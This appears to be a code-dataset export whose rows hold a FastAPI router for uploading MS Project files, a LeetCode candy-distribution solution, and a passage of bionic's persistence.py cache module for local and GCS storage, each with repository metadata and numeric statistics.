| 0.176734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af7e5e86d0f60de6b492ec7b6eafdc2ebea4c16a
| 6,336
|
py
|
Python
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 1
|
2022-03-03T14:22:47.000Z
|
2022-03-03T14:22:47.000Z
|
project-management-api/app/routers/msprojects.py
|
paolo-demagistris-polito/pm-lab-polito-EnvForDigitalProjectDelivery
|
07e121a6613398bf3a8fbb9ec6831720bfcf2c33
|
[
"MIT"
] | 3
|
2022-01-20T05:22:52.000Z
|
2022-01-28T09:34:19.000Z
|
project-management-api/app/routers/msprojects.py
|
pm-lab-polito/EnvForDigitalProjectDelivery
|
0bda402f70160eccb8959ffac3d9baeccce60781
|
[
"MIT"
] | null | null | null |
"""
Module for the methods regarding MS Project files
"""
import jpype
import jsonpath_ng.ext
import mpxj
from fastapi import APIRouter, File, UploadFile
from datatypes.models import *
from dependencies import *
router = APIRouter(
prefix="/msprojects",
tags=["msprojects"],
dependencies=[]
)
@router.post("/",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def add_ms_file_to_project(file: UploadFile = File(...),
user: User = Depends(get_current_active_user),
db_project: Project = Depends(get_project),
session: Session = Depends(get_session)):
"""
    Add an MS Project (.mpp) file to a project
:param file: ms file to upload
:param user: current authenticated user
:param db_project: project to add the file to
:param session: session to use
:return: uploaded ms project
"""
if not file.filename.endswith(".mpp"):
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="File is not an MS Project (.mpp) file")
file_name = file.filename.split(".")[0]
content = await file.read()
jpype.startJVM()
from net.sf.mpxj.reader import UniversalProjectReader
project = UniversalProjectReader().read(jpype.java.io.ByteArrayInputStream(content))
tasks = []
for task in project.getTasks():
db_task = dict()
db_task["name"] = str(task.getName().toString())
db_task["level"] = task.getOutlineLevel()
db_task["duration"] = str(task.getDuration().toString())
db_task["predecessors"] = list()
db_task["ef"] = str(task.getEarlyFinish().toString())
db_task["es"] = str(task.getEarlyStart().toString())
db_task["lf"] = str(task.getLateFinish().toString())
db_task["ls"] = str(task.getLateStart().toString())
db_task["start"] = str(task.getStart().toString())
db_task["finish"] = str(task.getFinish().toString())
db_task["cost"] = str(task.getCost().toString())
db_task["id"] = str(task.getID().toString())
for rel in task.getPredecessors():
db_pred = dict()
db_pred["target_task"] = str(rel.getTargetTask().getName().toString())
db_pred["target_task_id"] = str(rel.getTargetTask().getID().toString())
db_pred["lag"] = str(rel.getLag().toString())
db_pred["type"] = str(rel.getType().toString())
db_task["predecessors"].append(db_pred)
tasks.append(db_task)
resources = []
for res in project.getResources():
if res.getName() is not None and res.getName() != "":
db_res = dict()
db_res["name"] = str(res.getName().toString())
db_res["id"] = str(res.getID().toString())
resources.append(db_res)
project_properties = project.getProjectProperties()
proj_info = dict()
if project_properties.getStartDate() is not None:
proj_info["baseline_start"] = str(project_properties.getStartDate().toString())
if project_properties.getActualStart() is not None:
proj_info["actual_start"] = str(project_properties.getActualStart().toString())
if project_properties.getFinishDate() is not None:
proj_info["baseline_finish"] = str(project_properties.getFinishDate().toString())
if project_properties.getActualFinish() is not None:
proj_info["actual_finish"] = str(project_properties.getActualFinish().toString())
if project_properties.getBaselineDuration() is not None:
proj_info["baseline_duration"] = str(project_properties.getBaselineDuration().toString())
if project_properties.getActualDuration() is not None:
proj_info["actual_duration"] = str(project_properties.getActualDuration().toString())
    if project_properties.getCurrencyCode() is not None:  # the original checked getCurrencySymbol() but read getCurrencyCode()
proj_info["currency_code"] = str(project_properties.getCurrencyCode().toString())
tmp = crud.get_ms_project(session, db_project.project_name, file_name)
if tmp is not None:
db_msproj = tmp
else:
db_msproj = MSProject(project_name=db_project.project_name,
ms_project_name=file_name,
author_name=user.user_name)
db_msproj.update_author_name = user.user_name
db_msproj.tasks = tasks
db_msproj.resources = resources
db_msproj.proj_info = proj_info
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
for computed_field in db_msproj.computed_fields_reference:
jsonpath_expr = jsonpath_ng.ext.parse(computed_field.jsonpath)
match computed_field.field_from:
case MSProjectField.tasks:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.tasks)))
case MSProjectField.resources:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.resources)))
case MSProjectField.proj_info:
computed_field.field_value = list(map(lambda a: a.value, jsonpath_expr.find(db_msproj.proj_info)))
session.add(computed_field)
session.add(db_msproj)
session.commit()
session.refresh(db_msproj)
jpype.shutdownJVM()
return db_msproj
@router.get("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.view))])
async def get_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project)):
"""
Get ms file of a project
:param db_ms_project: ms project from dependencies
:return: ms project if found, 404 otherwise
"""
return db_ms_project
@router.delete("/{ms_project_name}",
dependencies=[Depends(require_project_permission(Permissions.edit))])
async def delete_ms_file_of_project(db_ms_project: MSProject = Depends(get_ms_project),
session: Session = Depends(get_session)):
"""
Delete ms file of a project
:param db_ms_project: ms project from dependencies
:param session: session from dependencies
:return: 200 ok if deleted, 404 if not found
"""
session.delete(db_ms_project)
session.commit()
    # unidiomatic but functional: FastAPI renders this HTTPException as a plain 200 response
    raise HTTPException(status_code=200, detail="OK")
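# A minimal usage sketch (hypothetical host and auth; the router is mounted
# under the /msprojects prefix inside a project context):
#
#     import requests
#     requests.post("https://api.example.com/msprojects/", files={"file": open("plan.mpp", "rb")})
#     requests.get("https://api.example.com/msprojects/plan")
#     requests.delete("https://api.example.com/msprojects/plan")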
| 37.94012
| 114
| 0.665404
| 755
| 6,336
| 5.365563
| 0.22649
| 0.037768
| 0.034559
| 0.022464
| 0.254505
| 0.250309
| 0.197729
| 0.182918
| 0.182918
| 0.130585
| 0
| 0.003228
| 0.217645
| 6,336
| 166
| 115
| 38.168675
| 0.814
| 0.006944
| 0
| 0.1
| 0
| 0
| 0.05149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.063636
| 0
| 0.081818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af808a47b333d62757233f327d638f9ef66a62b6
| 563
|
py
|
Python
|
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/1000-2000/1103. Distribute Candies to People/1103.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def distributeCandies(self, candies: int, n: int) -> List[int]:
ans = [0] * n
    # number of complete rows r satisfying r*n*(r*n + 1)/2 <= candies,
    # i.e. the positive root of n^2*r^2 + n*r - 2*candies = 0
    rows = int((-n + (n**2 + 8 * n**2 * candies)**0.5) / (2 * n**2))
accumN = rows * (rows - 1) * n // 2
for i in range(n):
ans[i] = accumN + rows * (i + 1)
givenCandies = (n**2 * rows**2 + n * rows) // 2
candies -= givenCandies
lastGiven = rows * n
i = 0
while candies > 0:
lastGiven += 1
actualGiven = min(lastGiven, candies)
candies -= actualGiven
ans[i] += actualGiven
i += 1
return ans
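# Worked example (LeetCode sample): distributeCandies(7, 4) -> [1, 2, 3, 1];
# rows = 0 full rows fit, so the while loop hands out 1, 2, 3 candies and the
# fourth person receives the remaining 1.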
| 24.478261
| 68
| 0.515098
| 78
| 563
| 3.717949
| 0.346154
| 0.034483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046997
| 0.319716
| 563
| 22
| 69
| 25.590909
| 0.710183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af815fbf98829714e6eda7b837a98b8d597117ab
| 38,711
|
py
|
Python
|
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
bionic/persistence.py
|
baxen/bionic
|
f722a72e9571b81f537ed51fcf15bc964a928024
|
[
"Apache-2.0"
] | null | null | null |
"""
This module provides local and cloud storage of computed values. The main
point of entry is the PersistentCache, which encapsulates this functionality.
"""
import attr
import os
import shutil
import tempfile
import yaml
import warnings
from uuid import uuid4
from pathlib import Path
from bionic.exception import EntitySerializationError, UnsupportedSerializedValueError
from .datatypes import Result
from .gcs import GcsTool
from .utils.files import (
ensure_dir_exists,
ensure_parent_dir_exists,
recursively_copy_path,
)
from .utils.misc import hash_simple_obj_to_hex, oneline
from .utils.urls import (
derelativize_url,
path_from_url,
relativize_url,
url_from_path,
)
from .tokenization import tokenize
import logging
logger = logging.getLogger(__name__)
try:
# The C-based YAML emitter is much faster, but requires separate bindings
# which may not be installed.
YamlDumper = yaml.CDumper
YamlLoader = yaml.CLoader
except AttributeError:
running_under_readthedocs = os.environ.get("READTHEDOCS") == "True"
if not running_under_readthedocs:
warnings.warn(
oneline(
"""
Failed to find LibYAML bindings;
falling back to slower Python implementation.
This may reduce performance on large flows.
Installing LibYAML should resolve this."""
)
)
YamlDumper = yaml.Dumper
YamlLoader = yaml.Loader
class PersistentCache:
"""
Provides a persistent mapping between Queries (things we could compute) and
saved Results (computed Queries). You use it by getting a CacheAccessor
for your specific query, and then performing load/save operations on the
accessor.
When looking up a Query, the cache searches for a saved artifact with a
matching Query. The Query may not match exactly: each Query contains a
Provenance, which represents all the code and data used to compute a value,
and two Provenances can match at different levels of precision, from a
"functional" match to an "exact" one. A functional match is sufficient to
treat two artifacts as interchangeable; the finer levels of matching are
only used by the "assisted versioning" system, which tries to detect
situations where a function's bytecode has changed but its version hasn't.
The cache has two tiers: a "local" tier on disk, which is cheap to access,
and an optional "cloud" tier backed by GCS, which is more expensive to
access (but globally accessible). For load operations, the cache returns
the cheapest artifact that functionally matches the Query. For save
operations, the cache records an exact entry in both tiers.
The cache actually has two distinct responsibilities: (a) translating
between in-memory Python objects and serialized files or blobs, and (b)
maintaining an "inventory" of these files and blobs. Currently it makes
sense to group these responsibilities together at each tier, where the
local inventory tracks the local files and the cloud inventory tracks the
cloud blobs. Each of these tiers is handled by a "store" class. However,
in the future we may have other types of persistent artifacts (like
database tables) which don't have their own inventory type. In this case
we might want to split these responsibilities out.
"""
def __init__(self, local_store, cloud_store):
self._local_store = local_store
self._cloud_store = cloud_store
def get_accessor(self, query):
return CacheAccessor(self, query)
class CacheAccessor:
"""
Provides a reference to the cache entries for a specific query. This
interface is convenient, and it also allows us to maintain some memoized
state for each query, saving redundant lookups.
"""
def __init__(self, parent_cache, query):
self.query = query
self.value_filename_stem = valid_filename_from_query(self.query) + "."
self._local = parent_cache._local_store
self._cloud = parent_cache._cloud_store
# These values are memoized to avoid roundtrips.
self._stored_local_entry = None
self._stored_cloud_entry = None
def flush_stored_entries(self):
"""
Flushes the stored local and cloud cached entries.
"""
self._stored_local_entry = None
self._stored_cloud_entry = None
def can_load(self):
"""
Indicates whether there are any cached artifacts for this query.
"""
try:
return self._get_nearest_entry_with_artifact() is not None
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_provenance(self):
"""
Returns the provenance of the nearest cached artifact for this query,
if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.provenance
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result(self):
"""
Returns a Result for the nearest cached artifact for this query, if one
exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
if entry.tier == "local":
file_path = path_from_url(entry.artifact_url)
elif entry.tier == "cloud":
blob_url = entry.artifact_url
file_path = self._file_from_blob(blob_url)
else:
raise AssertionError("Unrecognized tier: " + entry.tier)
value = self._value_from_file(file_path)
value_hash = self.query.protocol.tokenize_file(file_path)
return Result(
query=self.query,
value=value,
file_path=file_path,
value_hash=value_hash,
)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result_value_hash(self):
"""
Returns only the value hash for the nearest cached artifact for
this query, if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.value_hash
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def save_result(self, result):
"""
Saves a Result in each cache layer that doesn't already have an exact
match.
"""
try:
self._save_or_reregister_result(result)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def update_provenance(self):
"""
Adds an entry to each cache layer that doesn't already have an exact
        match for this query. There must already be at least one cached
functional match -- i.e., ``can_load()`` must already return True.
"""
try:
self._save_or_reregister_result(None)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def _save_or_reregister_result(self, result):
local_entry = self._get_local_entry()
cloud_entry = self._get_cloud_entry()
self.flush_stored_entries()
if result is not None:
value_wrapper = NullableWrapper(result.value)
file_path = result.file_path
value_hash = result.value_hash
else:
value_wrapper = None
file_path = None
value_hash = None
blob_url = None
if file_path is None:
if local_entry.has_artifact:
file_path = path_from_url(local_entry.artifact_url)
value_hash = local_entry.value_hash
elif value_wrapper is not None:
file_path = self._file_from_value(value_wrapper.value)
value_hash = self.query.protocol.tokenize_file(file_path)
else:
if cloud_entry is None or not cloud_entry.has_artifact:
raise AssertionError(
oneline(
"""
Attempted to register metadata with no result
argument and no previously saved values;
this suggests we called update_provenance() without
previously finding a cached value, which shouldn't
happen."""
)
)
blob_url = cloud_entry.artifact_url
file_path = self._file_from_blob(blob_url)
value_hash = cloud_entry.value_hash
if not local_entry.exactly_matches_query:
file_url = url_from_path(file_path)
local_entry = self._local.inventory.register_url(
self.query, file_url, value_hash,
)
self._stored_local_entry = local_entry
if self._cloud:
assert cloud_entry is not None
if not cloud_entry.exactly_matches_query:
if blob_url is None:
if cloud_entry.has_artifact:
blob_url = cloud_entry.artifact_url
else:
blob_url = self._blob_from_file(file_path)
cloud_entry = self._cloud.inventory.register_url(
self.query, blob_url, value_hash,
)
self._stored_cloud_entry = cloud_entry
def _get_nearest_entry_with_artifact(self):
"""
Returns the "nearest" -- i.e., most local -- cache entry for this
query.
"""
local_entry = self._get_local_entry()
if local_entry.has_artifact:
return local_entry
cloud_entry = self._get_cloud_entry()
if cloud_entry is not None and cloud_entry.has_artifact:
return cloud_entry
return None
def _get_local_entry(self):
if self._stored_local_entry is None:
self._stored_local_entry = self._local.inventory.find_entry(self.query)
return self._stored_local_entry
def _get_cloud_entry(self):
if self._stored_cloud_entry is None:
if self._cloud is None:
return None
self._stored_cloud_entry = self._cloud.inventory.find_entry(self.query)
return self._stored_cloud_entry
def _file_from_blob(self, blob_url):
dir_path = self._local.generate_unique_dir_path(self.query)
filename = path_from_url(blob_url).name
file_path = dir_path / filename
ensure_parent_dir_exists(file_path)
logger.info("Downloading %s from GCS ...", self.query.task_key)
try:
self._cloud.download(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact blob", blob_url, e)
return file_path
def _blob_from_file(self, file_path):
url_prefix = self._cloud.generate_unique_url_prefix(self.query)
blob_url = url_prefix + "/" + file_path.name
logger.info("Uploading %s to GCS ...", self.query.task_key)
try:
self._cloud.upload(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
return blob_url
def _file_from_value(self, value):
dir_path = self._local.generate_unique_dir_path(self.query)
extension = self.query.protocol.file_extension_for_value(value)
value_filename = self.value_filename_stem + extension
value_path = dir_path / value_filename
ensure_parent_dir_exists(value_path)
try:
self.query.protocol.write(value, value_path)
except Exception as e:
# TODO Should we rename this to just SerializationError?
raise EntitySerializationError(
oneline(
f"""
Value of descriptor {self.query.dnode.to_descriptor()!r}
could not be serialized to disk
"""
)
) from e
return value_path
def _value_from_file(self, file_path):
value_filename = file_path.name
extension = value_filename[len(self.value_filename_stem) :]
try:
return self.query.protocol.read_with_extension(file_path, extension)
except UnsupportedSerializedValueError:
raise
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
def _raise_state_error_with_explanation(self, source_exc):
stores = [self._local]
if self._cloud:
stores.append(self._cloud)
inventory_root_urls = " and ".join(store.inventory.root_url for store in stores)
raise InvalidCacheStateError(
oneline(
f"""
Cached data may be in an invalid state; this should be
impossible but could have resulted from either a bug or a
change to the cached files. You should be able to repair
the problem by removing all cached files under
{inventory_root_urls}."""
)
) from source_exc
@attr.s(frozen=True)
class NullableWrapper:
"""
A simple wrapper for a value that might be None. We use this when we want
to distinguish between "we have a value which is None" from "we don't have a
value".
"""
value = attr.ib()
@attr.s(frozen=True)
class InventoryEntry:
"""
Represents a saved artifact tracked by an Inventory; returned by Inventory
to CacheAccessor.
"""
tier = attr.ib()
has_artifact = attr.ib()
artifact_url = attr.ib()
provenance = attr.ib()
exactly_matches_query = attr.ib()
value_hash = attr.ib()
@attr.s(frozen=True)
class MetadataMatch:
"""
Represents a match between a query and a saved artifact. `level` is a string
describing the match level, ranging from "functional" to "exact".
"""
metadata_url = attr.ib()
level = attr.ib()
# TODO Should we merge this with InventoryEntry?
@attr.s(frozen=True)
class ExternalCacheItem:
"""
Represents an inventory entry, but contains data intended to be exposed to users
via the Cache class.
"""
inventory = attr.ib()
abs_artifact_url = attr.ib()
abs_metadata_url = attr.ib()
descriptor = attr.ib()
class Inventory:
"""
Maintains a persistent mapping from Queries to artifact URLs. An Inventory
is backed by a "file system", which could correspond to either a local disk
or a cloud storage service. This file system is used to store
metadata records, each of which describes a Query and an artifact URL that
satisfies it. Metadata records are stored using a hierarchical naming
scheme whose levels correspond to the different levels of Provenance
matching.
"""
def __init__(self, name, tier, filesystem):
self.name = name
self.tier = tier
self._fs = filesystem
self.root_url = filesystem.root_url
def register_url(self, query, url, value_hash):
"""
Records metadata indicating that the provided Query is satisfied
by the provided URL, and returns a corresponding InventoryEntry.
"""
logger.debug(
"In %s inventory for %r, saving artifact URL %s ...",
self.tier,
query,
url,
)
expected_metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = None
if self._fs.exists(expected_metadata_url):
# This shouldn't happen, because the CacheAccessor shouldn't write
# to this inventory if we already have an exact match.
            logger.warning(  # .warn is a deprecated alias
"In %s cache, attempted to create duplicate entry mapping %r " "to %s",
self.tier,
query,
url,
)
metadata_record = self._load_metadata_if_valid_else_delete(
expected_metadata_url,
)
if metadata_record is None:
metadata_url, metadata_record = self._create_and_write_metadata(
query, url, value_hash,
)
assert metadata_url == expected_metadata_url
logger.debug(
"... in %s inventory for %r, created metadata record at %s",
self.tier,
query,
metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=url,
provenance=metadata_record.provenance,
exactly_matches_query=True,
value_hash=metadata_record.value_hash,
)
def find_entry(self, query):
"""
Returns an InventoryEntry describing the closest match to the provided
Query.
"""
logger.debug("In %s inventory for %r, searching ...", self.tier, query)
n_prior_attempts = 0
while True:
if n_prior_attempts in (10, 100, 1000, 10000, 100000, 1000000):
message = f"""
While searching in the {self.tier} cache for an entry matching
{query!r}, found {n_prior_attempts} invalid metadata files;
either a lot of artifact files were manually deleted,
or there's a bug in the cache code
"""
if n_prior_attempts == 1000000:
raise AssertionError("Giving up: " + oneline(message))
else:
                logger.warning(oneline(message))
n_prior_attempts += 1
match = self._find_best_match(query)
if not match:
logger.debug(
"... in %s inventory for %r, found no match", self.tier, query
)
return InventoryEntry(
tier=self.tier,
has_artifact=False,
artifact_url=None,
provenance=None,
exactly_matches_query=False,
value_hash=None,
)
metadata_record = self._load_metadata_if_valid_else_delete(
match.metadata_url
)
if metadata_record is None:
continue
logger.debug(
"... in %s inventory for %r, found %s match at %s",
self.tier,
query,
match.level,
match.metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=metadata_record.artifact_url,
provenance=metadata_record.provenance,
exactly_matches_query=(match.level == "exact"),
value_hash=metadata_record.value_hash,
)
def list_items(self):
metadata_urls = [
url for url in self._fs.search(self.root_url) if url.endswith(".yaml")
]
for metadata_url in metadata_urls:
metadata_record = self._load_metadata_if_valid_else_delete(metadata_url)
if metadata_record is None:
continue
artifact_url = metadata_record.artifact_url
yield ExternalCacheItem(
inventory=self,
abs_artifact_url=derelativize_url(artifact_url, metadata_url),
abs_metadata_url=metadata_url,
descriptor=metadata_record.descriptor,
)
def delete_url(self, url):
return self._fs.delete(url)
def _find_best_match(self, query):
equivalent_url_prefix = self._equivalent_metadata_url_prefix_for_query(query)
possible_urls = self._fs.search(equivalent_url_prefix)
equivalent_urls = [url for url in possible_urls if url.endswith(".yaml")]
if len(equivalent_urls) == 0:
return None
exact_url = self._exact_metadata_url_for_query(query)
if exact_url in equivalent_urls:
return MetadataMatch(metadata_url=exact_url, level="exact",)
samecode_url_prefix = self._samecode_metadata_url_prefix_for_query(query)
samecode_urls = [
url for url in equivalent_urls if url.startswith(samecode_url_prefix)
]
if len(samecode_urls) > 0:
return MetadataMatch(metadata_url=samecode_urls[0], level="samecode",)
nominal_url_prefix = self._nominal_metadata_url_prefix_for_query(query)
nominal_urls = [
url for url in equivalent_urls if url.startswith(nominal_url_prefix)
]
if len(nominal_urls) > 0:
return MetadataMatch(metadata_url=nominal_urls[0], level="nominal",)
return MetadataMatch(metadata_url=equivalent_urls[0], level="equivalent",)
def _equivalent_metadata_url_prefix_for_query(self, query):
return (
self._fs.root_url
+ "/"
+ valid_filename_from_query(query)
+ "/"
+ query.provenance.functional_hash
)
def _nominal_metadata_url_prefix_for_query(self, query):
minor_version_token = tokenize(query.provenance.code_version_minor)
return (
self._equivalent_metadata_url_prefix_for_query(query)
+ "/"
+ "mv_"
+ minor_version_token
)
def _samecode_metadata_url_prefix_for_query(self, query):
return (
self._nominal_metadata_url_prefix_for_query(query)
+ "/"
+ "bc_"
+ query.provenance.bytecode_hash
)
def _exact_metadata_url_for_query(self, query):
filename = f"metadata_{query.provenance.exact_hash}.yaml"
return self._nominal_metadata_url_prefix_for_query(query) + "/" + filename
def _load_metadata_if_valid_else_delete(self, url):
try:
metadata_yaml = self._fs.read_bytes(url).decode("utf8")
metadata_record = ArtifactMetadataRecord.from_yaml(metadata_yaml, url)
except Exception as e:
raise InternalCacheStateError.from_failure("metadata record", url, e)
if not self._fs.exists(metadata_record.artifact_url):
logger.info(
"Found invalid metadata record at %s, "
"referring to nonexistent artifact at %s; "
"deleting metadata record",
url,
metadata_record.artifact_url,
)
self.delete_url(url)
return None
else:
return metadata_record
def _create_and_write_metadata(self, query, artifact_url, value_hash):
metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = ArtifactMetadataRecord.from_content(
dnode=query.dnode,
artifact_url=artifact_url,
provenance=query.provenance,
metadata_url=metadata_url,
value_hash=value_hash,
)
self._fs.write_bytes(metadata_record.to_yaml().encode("utf8"), metadata_url)
return metadata_url, metadata_record
class LocalStore:
"""
Represents the local disk cache. Provides both an Inventory that manages
artifact (file) URLs, and a method to generate those URLs (for creating
new files).
"""
def __init__(self, root_path_str):
root_path = Path(root_path_str).absolute()
self._artifact_root_path = root_path / "artifacts"
inventory_root_path = root_path / "inventory"
tmp_root_path = root_path / "tmp"
self.inventory = Inventory(
"local disk", "local", LocalFilesystem(inventory_root_path, tmp_root_path)
)
def generate_unique_dir_path(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
path = (
self._artifact_root_path
/ valid_filename_from_query(query)
/ str(uuid4())
)
if not path.exists():
return path
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
directory name; {path} already exists"""
)
)
class GcsCloudStore:
"""
Represents the GCS cloud cache. Provides both an Inventory that manages
artifact (blob) URLs, and a method to generate those URLs (for creating
those blobs).
"""
def __init__(self, url):
self._tool = GcsTool(url)
self.inventory = Inventory(
"GCS", "cloud", GcsFilesystem(self._tool, "/inventory")
)
self._artifact_root_url_prefix = url + "/artifacts"
def generate_unique_url_prefix(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
url_prefix = "/".join(
[
str(self._artifact_root_url_prefix),
valid_filename_from_query(query),
str(uuid4()),
]
)
matching_blobs = self._tool.blobs_matching_url_prefix(url_prefix)
if len(list(matching_blobs)) == 0:
return url_prefix
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
blob name; {self._artifact_root_url_prefix}
already exists"""
)
)
def upload(self, path, url):
# TODO For large individual files, we may still want to use gsutil.
if path.is_dir():
self._tool.gsutil_cp(str(path), url)
else:
assert path.is_file()
self._tool.blob_from_url(url).upload_from_filename(str(path))
def download(self, path, url):
blob = self._tool.blob_from_url(url)
# TODO For large individual files, we may still want to use gsutil.
if not blob.exists():
# `gsutil cp -r gs://A/B X/Y` doesn't work when B contains
# multiple files and Y doesn't exist yet. However, if B == Y, we
# can run `gsutil cp -r gs://A/B X`, which will create Y for us.
assert path.name == blob.name.rsplit("/", 1)[1]
self._tool.gsutil_cp(url, str(path.parent))
else:
blob.download_to_filename(str(path))
class FakeCloudStore(LocalStore):
"""
A mock version of the GcsCloudStore that's actually backed by local files.
Useful for running tests without setting up a GCS connection, which is
slow and requires some configuration.
"""
def __init__(self, root_path_str):
super(FakeCloudStore, self).__init__(root_path_str)
def generate_unique_url_prefix(self, query):
return url_from_path(self.generate_unique_dir_path(query))
def upload(self, path, url):
src_path = path
dst_path = path_from_url(url)
recursively_copy_path(src_path, dst_path)
def download(self, path, url):
src_path = path_from_url(url)
dst_path = path
recursively_copy_path(src_path, dst_path)
class LocalFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to local disk.
"""
def __init__(self, inventory_dir, tmp_dir):
self.root_url = url_from_path(inventory_dir)
self.tmp_root_path = tmp_dir
def exists(self, url):
return path_from_url(url).exists()
def search(self, url_prefix):
path_prefix = path_from_url(url_prefix)
if not path_prefix.is_dir():
return []
return [
url_from_path(path_prefix / sub_path)
for sub_path in path_prefix.glob("**/*")
]
def delete(self, url):
path = path_from_url(url)
if not path.exists():
return False
path.unlink()
return True
def write_bytes(self, content_bytes, url):
path = path_from_url(url)
ensure_parent_dir_exists(path)
ensure_dir_exists(self.tmp_root_path)
working_dir = Path(tempfile.mkdtemp(dir=str(self.tmp_root_path)))
try:
working_path = working_dir / "tmp_file"
working_path.write_bytes(content_bytes)
working_path.rename(path)
finally:
shutil.rmtree(str(working_dir))
def read_bytes(self, url):
return path_from_url(url).read_bytes()
class GcsFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to GCS.
"""
def __init__(self, gcs_tool, object_prefix_extension):
self._tool = gcs_tool
self.root_url = self._tool.url + object_prefix_extension
def exists(self, url):
# Checking for "existence" on GCS is slightly complicated. If the URL in
# question corresponds to a single file, we should find an object with a
# matching name. If it corresponds to directory of files, we should find one or
# more objects with a matching prefix (the expected name followed by a slash).
return any(
found_url == url or found_url.startswith(url + "/")
for found_url in self.search(url)
)
def search(self, url_prefix):
return [
self._tool.url_from_object_name(blob.name)
for blob in self._tool.blobs_matching_url_prefix(url_prefix)
]
def delete(self, url):
blob = self._tool.blob_from_url(url)
if blob is None:
return False
blob.delete()
return True
def write_bytes(self, content_bytes, url):
self._tool.blob_from_url(url).upload_from_string(content_bytes)
def read_bytes(self, url):
return self._tool.blob_from_url(url).download_as_string()
class InternalCacheStateError(Exception):
"""
Indicates a problem with the integrity of our cached data. Before this is
surfaced to a user, it should be converted to an InvalidCacheStateError.
"""
@classmethod
def from_failure(cls, artifact_type, location, exc):
return cls(f"Unable to read {artifact_type} {location!r} in cache: {exc}")
class InvalidCacheStateError(Exception):
"""
Indicates that the cache state may have been corrupted.
"""
def valid_filename_from_query(query):
"""
Generates a filename from a query.
This just gets the descriptor string from the query and replaces any
spaces with hyphens. (At the time of writing, descriptors can't contain
spaces, but in the future they will be able to.)
"""
return query.dnode.to_descriptor().replace(" ", "-")
CACHE_SCHEMA_VERSION = 8
class YamlRecordParsingError(Exception):
pass
class ArtifactMetadataRecord:
"""
Describes a persisted artifact. Intended to be stored as a YAML file.
"""
@classmethod
def from_content(cls, dnode, artifact_url, provenance, metadata_url, value_hash):
return cls(
body_dict=dict(
descriptor=dnode.to_descriptor(),
artifact_url=relativize_url(artifact_url, metadata_url),
